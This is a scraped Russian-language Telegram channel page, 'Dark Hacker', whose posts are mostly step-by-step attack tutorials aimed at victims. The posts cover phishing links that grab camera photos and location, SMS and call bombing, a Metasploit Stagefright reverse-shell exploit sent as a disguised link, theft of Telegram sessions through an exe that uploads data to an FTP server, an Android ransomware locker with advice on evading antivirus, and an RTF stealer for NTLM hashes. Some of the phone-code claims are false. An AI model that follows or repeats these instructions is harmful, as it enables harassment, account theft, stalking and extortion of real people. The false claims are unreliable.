Dark Hacker


Гео и язык канала: Россия, Русский
Категория: Даркнет


По вопросам рекламы - @andrej_rek

Менеджер - @d1n00l

Связанные каналы

Гео и язык канала
Россия, Русский
Категория
Даркнет
Статистика
Фильтр публикаций


🔝 Мультитул для деанона жертвы с помощью фишинговой ссылки


Storm Breaker— утилита для создания фишинговой ссылки, которая в свою очередь производит и "крадет" фотографию с камеры жертвы. Так же можно получить доступ к местоположению смартфона жертвы, украсть пароли с Windows 10, получить доступ к веб-камере и микрофону.


Установка на Linux


▫️ git clone


https://github.com/ultrasecurity/Storm-Breaker


▫️ cd Storm-Breaker


▫️ sudo bash linux-installer.sh


▫️ python3 -m pip install -r requirments.txt


▫️ sudo python3 Storm-Breaker.py


[Строго в ознакомительных целях, автор не несёт ответственности за ваши действия]


🔝 Как устроить мощнейшую СМС-Атаку?


Сегодня мы покажем вам весьма надежный способ организации мощной SMS-атаки на любой номер телефона. Данную атаку можно спокойно использовать для того, чтобы проучить своего неприятеля и попросту вывести его из себя.

Первым делом обновляем нужные пакеты:


▫️ apt update & apt upgrade -y


Затем нам нужно установить пакет "Git"


▫️ pkg install git


После чего устанавливаем утилиту с Github:


▫️ git clone


https://github.com/Argisht44/android.git


Далее просто прописываем следующие команды по очереди:


▫️ cd android


▫️ cd Infinite-Bomber-arm64


▫️ chmod 777 infinite-bomber


И запускаем утилиту:


./infinite-bomber


После того, как она будет запущена, нам нужно только ввести номер, после чего атака начнётся.


🔝 Получаем доступ к телефону


В данном посте мы поговорим о том, как при помощи всего-лишь одной ссылки получить полный контроль над чужим устройством.


Поможет нам в этом специальная утилита Metasploit, которая прекрасно справляется с уязвимостями Android старых версий.

Первым делом устанавливаем нашу утилиту в Termux:


▫️update


▫️apt upgrade


▫️pkg install unstable-repo


▫️pkg install metasploit


После этого запускаем утилиту


• Теперь, если Stagefright нет в Metasploit, то скачиваем его отсюда /→ ТЫК ← и перекидываем в папку с эксплоитами.


После этого прописываем:


msfconsole — открытие консоли


🔻 use exploit/android/browser/stagefrightmp4tx3g64bit — подключение эксплоита


🔻set SRVHOST ваш IP


🔻URIPATH /
set PAYLOAD
linux/armle/mettle/reversetcp


🔻set LHOST вашIP


🔻set VERBOSE true


🔻exploit j — запуск эксплоита


Для нас сгенерируется специальная ссылка. Заворачиваем её в ngrok, по желанию маскируем и отправляем жертве под любым предлогом. Когда жертва по ней перейдёт, мы получим удалённый доступ к телефону.


🔝 Взлом Wi-Fi с помощью AirGeddon!


Существует такая утилита, как AirCrack. Взлом Wi-Fi с её использованием осуществляется путём перехвата и последующей расшифровки handshake.


• AirGeddon - это инструмент, следующего поколения, способный автоматизировать данную операцию.
Он позволит Вам перехватывать и расшифровывать handshake в считанные секунды.


❗️Установка❗️


▫️ git clone


https://github.com/v1s1t0r1sh3r3/airgeddon.git


▫️ cd airgeddon/


🛠Использование🛠


▫️ bash airgeddon.sh


• Сразу после запуска перед вами появится главное меню утилиты.
Для перехвата handshake нужно перевести сетевую карту в режим монитора, для этого пропишите "2", а затем "5".


🔝 ​Маскируем фишинг ссылки!

• Наверное каждый, знает, что такое "Ngrok" или "Serveo". Это некие "клиенты", которые позволяют туннелировать трафик, в интернете. Но подобные ссылки вызывают сильное подозрение, даже если вы их сократили.

UrlPhish - это утилита, которая может маскировать фишинг-ссылку так, чтобы самый обычный юзер даже не смог догадаться, что его хотят взломать.

Установка:

▫️ apt install git python

▫️ git clone

https://github.com/termux-lab/UrlPhish.git

▫️ cd UrlPhish

Использование:

▫️ python urlp.py -- запуск утилиты

🖇Выбираете сайт, указываете уже готовую фишинг ссылку, даёте ей нужное имя. И.. Готово!


🔝 Шифрование и сокрытие файлов в Windows


• Способ шифрования, который будет рассмотрен в этом посте, к сожалению работает только на Windows, а всё потому, что в своей работе утилита использует ресурсы ФС NTFS.


Установка:


▫️- pip install pyCrypto


Чтобы расшифровать данные, используйте следующую команду:

▫️ - python crypt.py name_folder_or_file name_file password


🔻Плюсом данного инструмента является то, что в одной папке можно зашифровать неограниченное количество данных. Также, злоумышленнику чтобы расшифровать такой файл, потребуется очень много сил и времени.🔻

▫️https://github.com/AndreyKoval3000/Cryp


​​🔝 Как взломать веб камеру с помощью Termux


В данном посте будет представлена утилита, способная спарить и получить доступ к камерам видеонаблюдения. Парсинг представляет собой процесс сбора данных с последующей их обработкой и анализом.


❗️🔻Установка🔻❗️


🔻 apt install python3


🔻 apt install git


🔻 git clone


▫️ https://github.com/yan4ikyt/webhack ▫️


🔻 cd webhack


🔻 bash install.sh


Код для использования:


🔻 python WebHack.py


После ввода данной команды выбираем страну и утилита нам выдаст IP камер. Теперь можно вставлять полученные IP в браузер и просматривать.

❗️Предупреждение: половина камер под паролем❗️


​​🔝 Вычисляем передвижение IOS-устройств

С развитием технологий мобильный телефон все больше превращается из обычного устройства для переговоров в устройство, шпионящее за своим владельцем. Разработчики софта под смартфоны как будто специально стараются предоставить окружающим доступ к личной информации пользователя. С одной стороны, это нехорошо, с другой — порой грех не воспользоваться этим.

Чтобы вычислить человека с IOS устройством, достаточно задействовать утилиту ISniff-GPS. ISniff-GPS прослушивает ARP пакеты близлежащих Ipad и других беспроводных устройств.

Цель такой прослушки — собрать данные, на основании которых можно будет идентифицировать каждое устройство, и определить географическое местоположение, основываясь исключительно на информации о последней использованной WiFi сети.

• Устанавливаем Kali Linux или Консоль Кали

Вводим команды в консоль:

🔻apt-get install python-scapy

🔻git clone https://github.com/hubert3/iSniff-GPS.git

🔻cd iSniff-GPS/

🔻pip install -U -r requirements.txt

• Запускаем веб-сервер для пользовательского графического интерфейса

🔻 ./manage.py runserver 127.0.0.1:8000 &

• Запускаем прослушивание

🔻️ ./run.sh -i wlan0

После ввода последней команды, будет доступно местоположение устройства, которое вы хотите отследить.


​​🔝 Как забанить любого пользователя Вконтакте с помощью Termux?

Итак, блочить будем через утилиту, которая использует так называемый токен ВК.

Утилита FAST-BAN

• Сначала нам нужно зайти в Termux и ввести данную команду:

🔻 pkg install python3

🔻 pkg install git

🔻 pip install vk api

🔻 pip install requests

🔻 pip install colorama

🔻 git clone
https://github.com/darkcoding12/FAST-BAN

• Чтобы запустить наш скрипт нам нужно прописать в консоли это:

cd FAST-BAN
python http://fastban.py/

Для того, чтобы забанить любого пользователя ВКонтакте, вам необходимо вставить его токен в поле ввода. Если токена не будет забанить не получится как бы не хотелось.
Спустя 5-15 секунд аккаунт будет забанен.

Откуда взять тот самый ТОКЕН?

• Все очень просто вашей жертве необходимо перейти на этот https://vkhost.github.io/ сайт, чтобы узнать свой токен.


​Спам звонками в Termux

🔝CALL Bomber - это более усовершенствованная версия SMS Bomber'a, только тут для атаки используются не SMS, а звонки. Максимально эффективная и быстрая атака, которая точно не оставит жертву в покое, пока она не будет отключена.

❗️Установка:

▫️ apt install git python3-pip python3
▫️ pip3 install requests transliterate pyarmor
▫️ git clone https://github.com/pentestxr/Fludilka.git
▫️ cd Fludilka
▫️ cd Termux

Использование:

▫️ python fludilka.py

❗️❗️❗️Далее вводим номер.
✅Готово! Атака началась, теперь жертве будут без перебоя идти звонки, один за одним.


🔝Создаем «битый» файл!

Срыв дедлайнов это всегда стресс для работника и начальника. Но что если вы отправите рабочий файл вовремя, но открыть его не представится возможным, ведь он повредился в результате отправки по сети? Это поможет выиграть некоторое время для выполнения и доведения до ума любого проекта

Сервис Corrupt a file делает любой загруженный файл битым. Всё что вам нужно это загрузить в него файл с нужным названием, весом и форматом. Сервис сделает всю остальную работу за вас. В итоге файл нельзя будет открыть или восстановить.

❗️❗️❗️Сервис работает с любым форматом файлов, от текстовых документов, до презентаций и сложных приложений. Это делает его универсальным помощником для людей с проблемами тайм-менеджмента❗️❗️❗️


🔝​Надёжное шифрование файлов!

В данном посте будет рассмотрен способ надежного шифрования ваших данных, с целью их защиты от постороннего вмешательства.

Шифрование использовали во все времена, и 100 и 1000 лет назад, вспомните хотя бы азбуку морзе, она была придумана для передачи важной информации по радиосвязи. Каждой букве и цифре соответствует определенный набор точек и тире. С течением времени практически ничего не изменилось, шифрование это уже не точки/тире, а единички и нолики.

🔻Установка:
$ pip3 install pyAesCrypt
$ git clone https://github.com/malorento/satoshi
$ cd satoshi

✅Использование:
$ python satoshi.py

❗️❗️❗️Для того чтобы зашифровать файл, нужно перекинуть его в директорию инструмента, а далее выбрать пункт 1 - Encrypt❗️❗️❗️


🔝Как легко угнать телеграм-аккаунты?

Сегодня я расскажу вам, как с помощью одной занимательной утилиты и пары инструментов завладеть чужим аккаунтом в телеге.

❗️Приступим!

1⃣Первым делом скачиваем архив
2⃣Устанавливаем на свой ПК Python
3⃣После этого переходим по ссылке и устанавливаем редактор кода Sublime Text 3.
4⃣Проходим регистрацию на FTP-сервере.
5⃣Приготовления готовы, теперь начнём действовать. С помощью. нашего редактора кода Sublime Text открываем скачанный файл и прописываем нашу информацию в коде: хост / логин и пароль от FTP-серва на который будет поступать информация.
6⃣Теперь компилируем код Python в exe-файле.
7⃣После компиляции отправляем наш готовый файл .exe потенциальной жертве и ждём когда она его откроет, после чего мы получим 2 файла .zip, которые придут на FTP-сервер.
8⃣Скачиваем Telegram Portable, после чего открываем в Telegram папочку tdata. В неё будет ещё одна папочка D877F783D5D3EF8C - открываем её и заменяем map0 или map1 на свой файл с сервера tdata.zip.
9⃣Ещё раз открываем tdata, потом находим файл D877F783D5D3EF8C и удаляем, и на его место закидываем свой файл с нашей tdata1.zip или tdata2.zip.
🔟Ну и последний шаг: открываем Telegram Portable, где у нас будет украденная сессия.


🔝​​Создание Android Locker через Termux.

Локер — программа-вымогатель, программа-шантажист или тип зловредного программного обеспечения, который предназначен для вымогательства. Локер блокирует доступ к компьютерной системе или предотвращает считывание записанных в нём данных, а затем требует от жертвы выкуп для восстановления исходного состояния.

🔻Установка:
$ git clone https://github.com/termuxhackers-id/SARA && cd SARA && bash install.sh

🔻Использование:
$ python3 sara.py

❗️Естественно, этот локер палят антивирусы, поэтому его обязательно нужно закриптовать❗️


🔝​Деаноним цель с помощью CamPhish

CamPhish - это утилита позволяющая создавать ссылку на сайт при переходе на который у вас спросит разрешение на доступ к камере и после разрешения пойдут фоточки.

❗️Установка:

$ apt upgrade
$ apt update
$ pkg install git -y
$ pkg install php -y
$ pkg install openssh -y
$ pkg install wget -y
$ git clone https://github.com/techchipnet/CamPhish

❗️Запуск:

$ cd CamPhish
$ chmod +x camphish.sh
$ bash camphish.sh

🔻Далее выбираем Ngrok, выбираем как будет выглядеть сайт, ОБЯЗАТЕЛЬНО включаем Точку доступа и жмем Enter. Копируем ссылку и кидаем жертве, после чего, перейдя на данную ссылку, жертва должна будет пройти мини опрос, а в свою очередь утилита пришлет нам все данные.

❗️❗️❗️Сохраненные фотки мы можем посмотреть в директории CamPhish❗️❗️❗️


🔝​​ОТКЛЮЧАЕМ СЛЕЖКУ НА ТЕЛЕФОНЕ!

❗️Сегодня мы поговорим о полезных командах на телефоне, которые позволят пользователю отключить слежку, узнать её подробности, а также почистить телефон от нежелательной информации.

Список команд:

1⃣*#21# - позволяет проверь переадресацию звонков и сообщений на другие номера.
2⃣*#06# - даёт информацию об IMEI.
3⃣*#62# - узнаём источник переадресации.
4⃣##002# - полностью выключаем слежку.
5⃣*#*#7780#*#* - удаляем все приложения с телефона.
6⃣#*5376# - удаляем с телефона все SMS-сообщения.
7⃣*2767*3855# - сбрасываем настройки до заводских.
8⃣*#*#34971539#*#* - получаем доступ ко всей информации о камере и телефоне.

Пользуйтесь на здоровье!😉


🔝​Проверяем статус номера в сети!

В настоящее время пробить номер не составляет труда даже для обычного пользователя. В интернете уже давно в свободном доступе продают услуги по пробиву телефонного номера. Однако случаются такие ситуации в жизни, когда даже проверенные сервисы не могут помочь, ведь номер может быть подставным. Зачастую, реальные номера всегда находятся в сети. Если вы хотите проверить активность номера в настоящий момент, воспользуйтесь сервисом smsc. Данный сервис производит проверку номера HLR запросом.

HLR-запрос (расшифровывается как Home Location Register) представляет собой способ определения текущего состояния номера абонента. Запрос производится к базе данных сотовой компании, обслуживающей номер. Когда мы получим информацию о состоянии телефонного аппарата и узнаем его подлинность, можно смело делать выводы о подлинной принадлежности номера.

❗️❗️❗️Кроме того он может быть полезен для людей в сфере услуг, занимающихся рассылкой сообщений. Если у вас имеется для этого база номеров, то, пользуясь этим сайтом, вы сможете отсеять неактивные номера и сэкономить приличное количество денег❗️❗️❗️

✅Ссылки:

🔗 Smsc - https://smsc.ru/testhlr/


​Безвозвратно удаляем все данные на смартфоне!

🔝Перед продажей устройства всегда возникает необходимость в полном очищение хранилища от личных данных. Доверять заводскому сбросу настроек не стоит, ведь в интернете полно способов восстановления файлов.

Можно воспользоваться сторонними помощниками, например приложением Extirpater, которое уничтожит все данные на Android-устройстве без возможности восстановления. Перед применением стоит помнить, что подобные утилиты при частом использовании разрушают накопитель гаджета.

❗️Алгоритм очищения достаточно прост, но эффективен: при стандартном удалении данных, файлы не уничтожаются, а лишь исчезают из индекса файловой системы. Данный же инструмент заполняет оставшееся пространство диска случайным шумом, а затем все начисто очищает.


​🔝 30+ самых популярных инструментов Red Team.

Индустрия информационной безопасности асимметрична: атакующий находится в более удобном положении, чем защитник. Атакованной стороне нужно быть эффективной всегда, 24/7, а нападающей достаточно быть эффективной лишь единожды. Кроме того, у атакующего есть возможность тщательно изучить свою жертву перед активной фазой атаки, в то время как другая сторона начинает изучение нарушителя уже во время этой атаки.

❗️Про Red Team я писал уже очень много, сегодня хочу представить тебе материал, в котором собраны полезные инструменты которые использует красная команда. Список разделен по направлениям: разведка, повышение привилегий, #фишинг, удаленный доступ и многое другое...

🧷 30+ самых популярных инструментов Red Team.

🔻Дополнительный материал:
https://github.com/tcostam/awesome-command-control
https://github.com/marcosValle/awesome-windows-red-team
https://github.com/yeyintminthuhtut/Awesome-Red-Teaming
https://github.com/r3p3r/yeyintminthuhtut-Awesome-Red-Teaming
https://github.com/mishmashclone/yeyintminthuhtut-Awesome-Red-Teaming

❗️❗️❗️ Информация предоставлена исключительно в ознакомительных целях❗️❗️❗️


🔝Скачал книгу? Твои пароли уже у хакеров

Есть возможность интегрировать в RTF файл тот же стиллер, в результате чего пользователи, которые скачивают электронные книги в этом формате могу попасть под угрозой. Поскольку RTF - это язык разметки текста, возможностей его синтаксиса хватает для реализации подкачки внешних файлов.

Утилита WordSteal может продемонстрировать работу уязвимости RTF. Эта утилита без проблем вошьёт стиллер в RTF файл с картинкой. Когда жертва запустит этот файл, злоумышленнык удаленно получит NTLM хеши паролей Windows. Давайте посмотрим, как это работает на примере изображения:

🔺Настройка:

❗Для начала установим репозиторий и обновим права доступа:

git clone https://github.com/0x09AL/WordSteal.git
chmod +x main.py

✔Использование:

❗Для создания RTF файла со стиллером нам понадобится картинка.

◽️python main.py 1

✅После выполнения этой команды в директории появится RTF файл с пейлоадом. Чтобы её протестировать, нужно не закрывая терминала открыть этот файл на Windows. В терминал придут хеши паролей.

Показано 20 последних публикаций.

3 475

подписчиков
Статистика канала